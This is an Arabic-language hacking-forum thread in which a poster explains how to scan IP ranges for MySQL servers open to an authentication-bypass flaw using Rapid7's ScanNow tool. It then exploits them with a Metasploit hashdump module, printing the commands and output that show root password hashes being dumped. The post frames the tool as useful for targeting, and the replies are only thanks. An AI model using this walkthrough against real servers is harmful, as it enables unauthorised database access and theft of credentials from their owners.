[ أداة ] ScanNow MySQL CVE

الموضوع في 'قسم الأدوات' بواسطة Al-JoKeR, بتاريخ ‏23 فبراير 2013.

الوسوم:
حالة الموضوع:
مغلق
  1. Al-JoKeR

    Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    [​IMG]

    أخواني الكرام السلام عليكم

    [​IMG]

    #~ معلومات عن الاداة ~#

    #~ اداة : ScanNow MySQL
    #~ الشركة المبرمجة لها : rapid7
    وهي نفس الشركة المبرمجة لمشروع الميتاسبلويت
    #~ تتطلب الاداة وجود مترجم لغة جافا


    #~ مجانية الاستخدام ~#

    #~ طيب نجي لوظيفة الاداة ~#

    #~ اختبار قواعد البيانات من نوع Mysql
    من التخطي وتجاوز باسوورد الدخول
    #~ مفيدة بالاستهداف طبعا بحيث راح اشرح صور لها



    طيب نجي لشرح صور من البداية :


    [​IMG]

    ^

    هنا بعد تشغيل الاداة نملئ الفراغات بمعلومات
    ومن ثم نضغط على :
    Submit



    الخطوة التالية وهي تحديد الهدف وبامكانك تحديد رنج من الايبيات :

    [​IMG]

    ^

    هنا حددنا الايبيات من 1 الى 254

    الخطوة التالية وهي الفحص :

    [​IMG]

    ^

    جاري الفحص ... وعند الانتهاء يعطيك تقرير بسيط عن الفحص

    وعند وجود سيرفر مصاب بـ Mysql يتم استغلاله بمشروع الميتا سبلويت

    ويوجد استغلال اخر بسكربت مبرمج بلغة البايثون

    ولاكن كللها تستغل الضعف الامني المصاب به Mysql

    طيب بعد معرفة السيرفر المصاب بثغرة Mysql


    نستغل الثغرة بالميتا سبلويت على النحو التالي :


    كود PHP:
    msfconsole

    msf 
    > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

    msf  auxiliary
    (mysql_authbypass_hashdump) > set USERNAME root

    msf  auxiliary
    (mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

    msf  auxiliary
    (mysql_authbypass_hashdump) > run
    #~ الامر الاول :

    use auxiliary/scanner/mysql/mysql_authbypass_hashdump

    استخدمنا الاداة المساعدة لفحص الهدف واختبار التجاوز

    #~ الامر الثاني :

    set USERNAME root

    ضبطنا اسم المستخدم الافتراضي : root

    #~ الامر الثالث :

    set RHOSTS 127.0.0.1

    ضبطنا الريموت هوستس بمعنى المضيفات البعيدة وحددنا الايبي

    #~ الامر الرابع :

    run

    تشغيل الاداة


    وبعد نجاح العملية يظهر كالتالي :


    كود:
    [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
    [*] 127.0.0.1:3306 Authentication bypass is 10% complete
    [*] 127.0.0.1:3306 Authentication bypass is 20% complete
    [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
    
    
    [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
    
    
    [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
    [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    #~ هكذا تم الاستغلال وتم عرض باسوورد يوزر الـ root
    في برنامج قاعدة البيانات Mysql
    #~ تم حفظ الناتج بمستند نصي


    ... كذا انتهينا ...


    طيب نجي لتحميل الاداة من الموقع الرسمي :

    [DOWNLOAD]ScanNow MySQL CVE[/DOWNLOAD]

    #~ ان شاء الله يكون الموضوع واضح والشرح واضح ~#
     
  2. خأإآلد

    خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    K.s.A
    رد: ScanNow MySQL CVE

    الله يعطيك العافيه
    :{1}:
    واصل حبيبي
    &:":​
     
  3. GeNx

    GeNx Developer

    الأنتساب:
    ‏23 فبراير 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: ScanNow MySQL CVE

    مشكور اخى
    سلمت يدك
    :{4}:​
     
  4. غدر البشر

    غدر البشر Developer

    الأنتساب:
    ‏26 فبراير 2013
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    الشـــــــام
    رد: ScanNow MySQL CVE

    يعطيك العافيه&:":​
     
  5. السيف القاتل

    السيف القاتل Developer

    الأنتساب:
    ‏13 ديسمبر 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    العراق البصره
    رد: ScanNow MySQL CVE

    تسسسسسسسلم يابطل
    ماقصرت
     
  6. Al-JoKeR

    Al-JoKeR مساعد مشرف

    الأنتساب:
    ‏22 ديسمبر 2011
    المشاركات:
    133
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الوظيفة:
    طالب علم
    الإقامة:
    الجنة ان شاء الله
    رد: ScanNow MySQL CVE

    حياكم الله اخواني الكرام
    شاكركم من اعماق قلبي​
     
  7. Mr-Sp!R!T

    Mr-Sp!R!T Developer

    الأنتساب:
    ‏21 ديسمبر 2012
    المشاركات:
    90
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    I R A Q
    رد: ScanNow MySQL CVE

    وعليكم السلام ورحمه الله وبركاته

    مشكور حبي :{1}:
     
  8. X-Ray

    X-Ray Developer

    الأنتساب:
    ‏8 أغسطس 2012
    المشاركات:
    7
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    ELS
    الإقامة:
    Boston, MA
    رد: ScanNow MySQL CVE

    وعليكم السلام ورحمة الله وبركاته
    بارك الله فيك اخوي والله يسعدك يارب
    تقبل مروري
    تحياتي لسموك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة